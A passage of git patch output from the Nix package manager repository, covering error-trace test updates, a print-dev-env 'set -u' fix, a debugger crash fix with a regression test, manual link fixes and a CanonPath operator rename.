ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the partition function passed to builtins.partition")); } @@ -876,17 +876,17 @@ namespace nix { TEST_F(ErrorTraceTest, groupBy) { ASSERT_TRACE2("groupBy 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: 
%s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (x: x) [ \"foo\" \"bar\" 1 ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); } @@ -895,22 +895,22 @@ namespace nix { TEST_F(ErrorTraceTest, concatMap) { ASSERT_TRACE2("concatMap 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) [ \"foo\" ] # TODO", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: \"foo\") [ 1 2 ] # TODO", TypeError, - hintfmt("expected a list but found %s: 
%s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); } @@ -919,12 +919,12 @@ namespace nix { TEST_F(ErrorTraceTest, add) { ASSERT_TRACE2("add \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument of the addition")); ASSERT_TRACE2("add 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument of the addition")); } @@ -933,12 +933,12 @@ namespace nix { TEST_F(ErrorTraceTest, sub) { ASSERT_TRACE2("sub \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument of the subtraction")); ASSERT_TRACE2("sub 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument of the subtraction")); } @@ -947,12 +947,12 @@ namespace nix { TEST_F(ErrorTraceTest, mul) { ASSERT_TRACE2("mul \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while 
evaluating the first argument of the multiplication")); ASSERT_TRACE2("mul 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument of the multiplication")); } @@ -961,12 +961,12 @@ namespace nix { TEST_F(ErrorTraceTest, div) { ASSERT_TRACE2("div \"foo\" 1 # TODO: an integer was expected -> a number", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first operand of the division")); ASSERT_TRACE2("div 1 \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second operand of the division")); ASSERT_TRACE1("div \"foo\" 0", @@ -979,12 +979,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitAnd) { ASSERT_TRACE2("bitAnd 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.bitAnd")); ASSERT_TRACE2("bitAnd 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.bitAnd")); } @@ -993,12 +993,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitOr) { ASSERT_TRACE2("bitOr 1.1 2", TypeError, - hintfmt("expected an integer but found %s: 
%s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.bitOr")); ASSERT_TRACE2("bitOr 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.bitOr")); } @@ -1007,12 +1007,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitXor) { ASSERT_TRACE2("bitXor 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.bitXor")); ASSERT_TRACE2("bitXor 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.bitXor")); } @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }"), + hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }")), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1047,17 +1047,17 @@ namespace nix { TEST_F(ErrorTraceTest, substring) { ASSERT_TRACE2("substring {} \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a set", "{ }"), + hintfmt("expected an integer but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the first argument (the start offset) passed to 
builtins.substring")); ASSERT_TRACE2("substring 3 \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument (the substring length) passed to builtins.substring")); ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1079,7 +1079,7 @@ namespace nix { TEST_F(ErrorTraceTest, hashString) { ASSERT_TRACE2("hashString 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.hashString")); ASSERT_TRACE1("hashString \"foo\" \"content\"", @@ -1088,7 +1088,7 @@ namespace nix { ASSERT_TRACE2("hashString \"sha256\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.hashString")); } @@ -1097,12 +1097,12 @@ namespace nix { TEST_F(ErrorTraceTest, match) { ASSERT_TRACE2("match 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", 
ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.match")); ASSERT_TRACE2("match \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.match")); ASSERT_TRACE1("match \"(.*\" \"\"", @@ -1115,12 +1115,12 @@ namespace nix { TEST_F(ErrorTraceTest, split) { ASSERT_TRACE2("split 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.split")); ASSERT_TRACE2("split \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.split")); ASSERT_TRACE1("split \"f(o*o\" \"1foo2\"", @@ -1133,17 +1133,17 @@ namespace nix { TEST_F(ErrorTraceTest, concatStringsSep) { ASSERT_TRACE2("concatStringsSep 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", "{ }"), + hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string 
is buggy", TypeError, - hintfmt("cannot coerce %s to a string: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("cannot coerce %s to a string: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1152,7 +1152,7 @@ namespace nix { TEST_F(ErrorTraceTest, parseDrvName) { ASSERT_TRACE2("parseDrvName 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.parseDrvName")); } @@ -1161,12 +1161,12 @@ namespace nix { TEST_F(ErrorTraceTest, compareVersions) { ASSERT_TRACE2("compareVersions 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.compareVersions")); ASSERT_TRACE2("compareVersions \"abd\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.compareVersions")); } @@ -1175,7 +1175,7 @@ namespace nix { TEST_F(ErrorTraceTest, splitVersion) { ASSERT_TRACE2("splitVersion 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.splitVersion")); } From 770d2bc779d39c041293011892e80f5fcb6b76df Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:17:22 -0800 Subject: [PATCH 392/654] Key repeated values on attribute binding 
pointers, not value pointers Closes #8672 --- src/libexpr/print.cc | 4 ++-- tests/functional/repl.sh | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..915e8489a 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -152,7 +152,7 @@ struct ImportantFirstAttrNameCmp } }; -typedef std::set ValuesSeen; +typedef std::set ValuesSeen; class Printer { @@ -262,7 +262,7 @@ private: void printAttrs(Value & v, size_t depth) { - if (seen && !seen->insert(&v).second) { + if (seen && !seen->insert(v.attrs).second) { printRepeated(); return; } diff --git a/tests/functional/repl.sh b/tests/functional/repl.sh index 1b779c1f5..5f399aa44 100644 --- a/tests/functional/repl.sh +++ b/tests/functional/repl.sh @@ -156,7 +156,7 @@ testReplResponseNoRegex ' # Same for let expressions testReplResponseNoRegex ' let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = { ... }; y = { ... }; }' +' '{ x = «repeated»; y = { ... }; }' # The :p command should recursively print sets, but prevent infinite recursion testReplResponseNoRegex ' @@ -171,4 +171,4 @@ testReplResponseNoRegex ' # Same for let expressions testReplResponseNoRegex ' :p let x = { y = { a = 1; }; inherit x; }; in x -' '{ x = { x = «repeated»; y = { a = 1; }; }; y = «repeated»; }' +' '{ x = «repeated»; y = { a = 1; }; }' From e1131b59279f7cf9f9bea93b5355608d78097f65 Mon Sep 17 00:00:00 2001 From: Rodney Lorrimar Date: Sun, 4 Feb 2024 12:02:06 +0800 Subject: [PATCH 393/654] print-dev-env: Avoid using unbound shellHook variable Some tools which consume the "nix print-dev-env" rc script (such as "nix-direnv") are sensitive to the use of unbound variables. They use "set -u". The "nix print-dev-env" rc script initially unsets "shellHook", then loads variables from the derivation, and then evaluates "shellHook". However, most derivations don't have a "shellHook" attribute. So users get the error "shellHook: unbound variable". 
This can be demonstrated with the command: nix print-dev-env nixpkgs#hello | bash -u This commit changes the rc script to provide an empty fallback value for the "shellHook" variable. Closes: #7951 #8253 --- src/nix/develop.cc | 2 +- tests/functional/nix-shell.sh | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 1f2891378..403178a5d 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -354,7 +354,7 @@ struct Common : InstallableCommand, MixProfile for (auto & i : {"TMP", "TMPDIR", "TEMP", "TEMPDIR"}) out << fmt("export %s=\"$NIX_BUILD_TOP\"\n", i); - out << "eval \"$shellHook\"\n"; + out << "eval \"${shellHook:-}\"\n"; auto script = out.str(); diff --git a/tests/functional/nix-shell.sh b/tests/functional/nix-shell.sh index 13403fadb..04c83138e 100644 --- a/tests/functional/nix-shell.sh +++ b/tests/functional/nix-shell.sh @@ -118,10 +118,10 @@ diff $TEST_ROOT/dev-env{,2}.json # Ensure `nix print-dev-env --json` contains variable assignments. [[ $(jq -r .variables.arr1.value[2] $TEST_ROOT/dev-env.json) = '3 4' ]] -# Run tests involving `source <(nix print-dev-inv)` in subshells to avoid modifying the current +# Run tests involving `source <(nix print-dev-env)` in subshells to avoid modifying the current # environment. -set +u # FIXME: Make print-dev-env `set -u` compliant (issue #7951) +set -u # Ensure `source <(nix print-dev-env)` modifies the environment. 
( From 5ccb06ee1b4c757ff4ca0aa6eac15d5656f7774c Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 4 Feb 2024 16:42:00 +0100 Subject: [PATCH 394/654] fix debugger crashing while printing envs fixes #9932 --- .gitignore | 1 + src/libexpr/eval.cc | 8 +++++--- tests/functional/debugger.sh | 13 +++++++++++++ tests/functional/local.mk | 3 ++- 4 files changed, 21 insertions(+), 4 deletions(-) create mode 100644 tests/functional/debugger.sh diff --git a/.gitignore b/.gitignore index a47b195bb..a0a0786ed 100644 --- a/.gitignore +++ b/.gitignore @@ -94,6 +94,7 @@ perl/Makefile.config /tests/functional/ca/config.nix /tests/functional/dyn-drv/config.nix /tests/functional/repl-result-out +/tests/functional/debugger-test-out /tests/functional/test-libstoreconsumer/test-libstoreconsumer # /tests/functional/lang/ diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..398eec410 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -744,7 +744,8 @@ void printEnvBindings(const SymbolTable & st, const StaticEnv & se, const Env & if (se.up && env.up) { std::cout << "static: "; printStaticEnvBindings(st, se); - printWithBindings(st, env); + if (se.isWith) + printWithBindings(st, env); std::cout << std::endl; printEnvBindings(st, *se.up, *env.up, ++lvl); } else { @@ -756,7 +757,8 @@ void printEnvBindings(const SymbolTable & st, const StaticEnv & se, const Env & std::cout << st[i.first] << " "; std::cout << ANSI_NORMAL; std::cout << std::endl; - printWithBindings(st, env); // probably nothing there for the top level. + if (se.isWith) + printWithBindings(st, env); // probably nothing there for the top level. std::cout << std::endl; } @@ -778,7 +780,7 @@ void mapStaticEnvBindings(const SymbolTable & st, const StaticEnv & se, const En if (env.up && se.up) { mapStaticEnvBindings(st, *se.up, *env.up, vm); - if (!env.values[0]->isThunk()) { + if (se.isWith && !env.values[0]->isThunk()) { // add 'with' bindings. 
Bindings::iterator j = env.values[0]->attrs->begin(); while (j != env.values[0]->attrs->end()) { diff --git a/tests/functional/debugger.sh b/tests/functional/debugger.sh new file mode 100644 index 000000000..63d88cbf3 --- /dev/null +++ b/tests/functional/debugger.sh @@ -0,0 +1,13 @@ +source common.sh + +clearStore + +# regression #9932 +echo ":env" | expect 1 nix eval --debugger --expr '(_: throw "oh snap") 42' +echo ":env" | expect 1 nix eval --debugger --expr ' + let x.a = 1; in + with x; + (_: builtins.seq x.a (throw "oh snap")) x.a +' >debugger-test-out +grep -P 'with: .*a' debugger-test-out +grep -P 'static: .*x' debugger-test-out diff --git a/tests/functional/local.mk b/tests/functional/local.mk index 888c7e18a..f369c7c2c 100644 --- a/tests/functional/local.mk +++ b/tests/functional/local.mk @@ -127,7 +127,8 @@ nix_tests = \ toString-path.sh \ read-only-store.sh \ nested-sandboxing.sh \ - impure-env.sh + impure-env.sh \ + debugger.sh ifeq ($(HAVE_LIBCPUID), 1) nix_tests += compute-levels.sh From 721fddac2f1cb633823046d97f465c579540de43 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 4 Feb 2024 22:03:13 +0100 Subject: [PATCH 395/654] use the right heading level (#9935) --- doc/manual/src/installation/upgrading.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/installation/upgrading.md b/doc/manual/src/installation/upgrading.md index 47618e2f5..38edcdbc5 100644 --- a/doc/manual/src/installation/upgrading.md +++ b/doc/manual/src/installation/upgrading.md @@ -16,7 +16,7 @@ nix (Nix) 2.18.1 > Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with [`nix-build`](@docroot@/command-ref/nix-build.md) or [`nix-store --realise`](@docroot@/command-ref/nix-store/realise.md), may change the database schema! > Reverting to an older version of Nix may therefore require purging the store database before it can be used. 
-### Linux multi-user +## Linux multi-user ```console $ sudo su From 8b873edcca2ff9f9f11efe3cba42a291dbdd124a Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 4 Feb 2024 22:15:20 +0100 Subject: [PATCH 396/654] fix anchor link; less weird link texts (#9936) --- doc/manual/src/language/operators.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/doc/manual/src/language/operators.md b/doc/manual/src/language/operators.md index e9cbb5c92..6fd66864b 100644 --- a/doc/manual/src/language/operators.md +++ b/doc/manual/src/language/operators.md @@ -84,7 +84,7 @@ The `+` operator is overloaded to also work on strings and paths. > > *string* `+` *string* -Concatenate two [string]s and merge their string contexts. +Concatenate two [strings][string] and merge their string contexts. [String concatenation]: #string-concatenation @@ -94,7 +94,7 @@ Concatenate two [string]s and merge their string contexts. > > *path* `+` *path* -Concatenate two [path]s. +Concatenate two [paths][path]. The result is a path. [Path concatenation]: #path-concatenation @@ -150,9 +150,9 @@ If an attribute name is present in both, the attribute value from the latter is Comparison is -- [arithmetic] for [number]s -- lexicographic for [string]s and [path]s -- item-wise lexicographic for [list]s: +- [arithmetic] for [numbers][number] +- lexicographic for [strings][string] and [paths][path] +- item-wise lexicographic for [lists][list]: elements at the same index in both lists are compared according to their type and skipped if they are equal. All comparison operators are implemented in terms of `<`, and the following equivalencies hold: @@ -163,12 +163,12 @@ All comparison operators are implemented in terms of `<`, and the following equi | *a* `>` *b* | *b* `<` *a* | | *a* `>=` *b* | `! 
(` *a* `<` *b* `)` | -[Comparison]: #comparison-operators +[Comparison]: #comparison ## Equality -- [Attribute sets][attribute set] and [list]s are compared recursively, and therefore are fully evaluated. -- Comparison of [function]s always returns `false`. +- [Attribute sets][attribute set] and [lists][list] are compared recursively, and therefore are fully evaluated. +- Comparison of [functions][function] always returns `false`. - Numbers are type-compatible, see [arithmetic] operators. - Floating point numbers only differ up to a limited precision. From 8d4890c3f83366a0d40ed7f9c3ee21dbd6a2ef67 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 4 Feb 2024 22:45:10 +0100 Subject: [PATCH 397/654] catch multiple use of link reference (#9937) --- doc/manual/src/language/import-from-derivation.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/doc/manual/src/language/import-from-derivation.md b/doc/manual/src/language/import-from-derivation.md index 03b3f9d91..fb12ba51a 100644 --- a/doc/manual/src/language/import-from-derivation.md +++ b/doc/manual/src/language/import-from-derivation.md @@ -1,6 +1,8 @@ # Import From Derivation -The value of a Nix expression can depend on the contents of a [store object](@docroot@/glossary.md#gloss-store-object). +The value of a Nix expression can depend on the contents of a [store object]. + +[store object]: @docroot@/glossary.md#gloss-store-object Passing an expression `expr` that evaluates to a [store path](@docroot@/glossary.md#gloss-store-path) to any built-in function which reads from the filesystem constitutes Import From Derivation (IFD): From a6737b7e179fba2681393335c69c97df9bd5a2b0 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 5 Feb 2024 15:13:11 +0100 Subject: [PATCH 398/654] CanonPath, SourcePath: Change operator + to / This is less confusing and makes it more similar to std::filesystem::path. 
--- src/libexpr/eval.cc | 4 ++-- src/libexpr/primops.cc | 2 +- src/libfetchers/filtering-input-accessor.cc | 14 +++++++------- src/libfetchers/fs-input-accessor.cc | 2 +- src/libfetchers/git-utils.cc | 2 +- src/libfetchers/git.cc | 4 ++-- src/libfetchers/mercurial.cc | 2 +- src/libfetchers/path.cc | 2 +- src/libstore/binary-cache-store.cc | 4 ++-- src/libstore/local-fs-store.cc | 2 +- src/libstore/nar-accessor.cc | 2 +- src/libutil/archive.cc | 10 +++++----- src/libutil/canon-path.cc | 4 ++-- src/libutil/canon-path.hh | 4 ++-- src/libutil/fs-sink.cc | 2 +- src/libutil/git.cc | 2 +- src/libutil/source-path.cc | 8 ++++---- src/libutil/source-path.hh | 5 +++-- src/nix-env/nix-env.cc | 4 ++-- src/nix/ls.cc | 2 +- src/nix/run.cc | 2 +- src/nix/why-depends.cc | 2 +- tests/unit/libutil/canon-path.cc | 10 +++++----- 23 files changed, 48 insertions(+), 47 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..bebc94873 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2689,14 +2689,14 @@ SourcePath resolveExprPath(SourcePath path) // Basic cycle/depth limit to avoid infinite loops. if (++followCount >= maxFollow) throw Error("too many symbolic links encountered while traversing the path '%s'", path); - auto p = path.parent().resolveSymlinks() + path.baseName(); + auto p = path.parent().resolveSymlinks() / path.baseName(); if (p.lstat().type != InputAccessor::tSymlink) break; path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; } /* If `path' refers to a directory, append `/default.nix'. 
*/ if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) - return path + "default.nix"; + return path / "default.nix"; return path; } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 1197b6e13..f8ded0cf8 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1816,7 +1816,7 @@ static void prim_readDir(EvalState & state, const PosIdx pos, Value * * args, Va // detailed node info quickly in this case we produce a thunk to // query the file type lazily. auto epath = state.allocValue(); - epath->mkPath(path + name); + epath->mkPath(path / name); if (!readFileType) readFileType = &state.getBuiltin("readFileType"); attr.mkApp(readFileType, epath); diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc index 581ce3c1d..087a100af 100644 --- a/src/libfetchers/filtering-input-accessor.cc +++ b/src/libfetchers/filtering-input-accessor.cc @@ -5,26 +5,26 @@ namespace nix { std::string FilteringInputAccessor::readFile(const CanonPath & path) { checkAccess(path); - return next->readFile(prefix + path); + return next->readFile(prefix / path); } bool FilteringInputAccessor::pathExists(const CanonPath & path) { - return isAllowed(path) && next->pathExists(prefix + path); + return isAllowed(path) && next->pathExists(prefix / path); } std::optional FilteringInputAccessor::maybeLstat(const CanonPath & path) { checkAccess(path); - return next->maybeLstat(prefix + path); + return next->maybeLstat(prefix / path); } InputAccessor::DirEntries FilteringInputAccessor::readDirectory(const CanonPath & path) { checkAccess(path); DirEntries entries; - for (auto & entry : next->readDirectory(prefix + path)) { - if (isAllowed(path + entry.first)) + for (auto & entry : next->readDirectory(prefix / path)) { + if (isAllowed(path / entry.first)) entries.insert(std::move(entry)); } return entries; @@ -33,12 +33,12 @@ InputAccessor::DirEntries FilteringInputAccessor::readDirectory(const CanonPath std::string 
FilteringInputAccessor::readLink(const CanonPath & path) { checkAccess(path); - return next->readLink(prefix + path); + return next->readLink(prefix / path); } std::string FilteringInputAccessor::showPath(const CanonPath & path) { - return next->showPath(prefix + path); + return next->showPath(prefix / path); } void FilteringInputAccessor::checkAccess(const CanonPath & path) diff --git a/src/libfetchers/fs-input-accessor.cc b/src/libfetchers/fs-input-accessor.cc index c3d8d273c..46bc6b70d 100644 --- a/src/libfetchers/fs-input-accessor.cc +++ b/src/libfetchers/fs-input-accessor.cc @@ -48,7 +48,7 @@ struct FSInputAccessor : InputAccessor, PosixSourceAccessor CanonPath makeAbsPath(const CanonPath & path) { - return root + path; + return root / path; } std::optional getPhysicalPath(const CanonPath & path) override diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 382a363f0..1256a4c2c 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -295,7 +295,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this throw Error("getting working directory status: %s", git_error_last()->message); /* Get submodule info. 
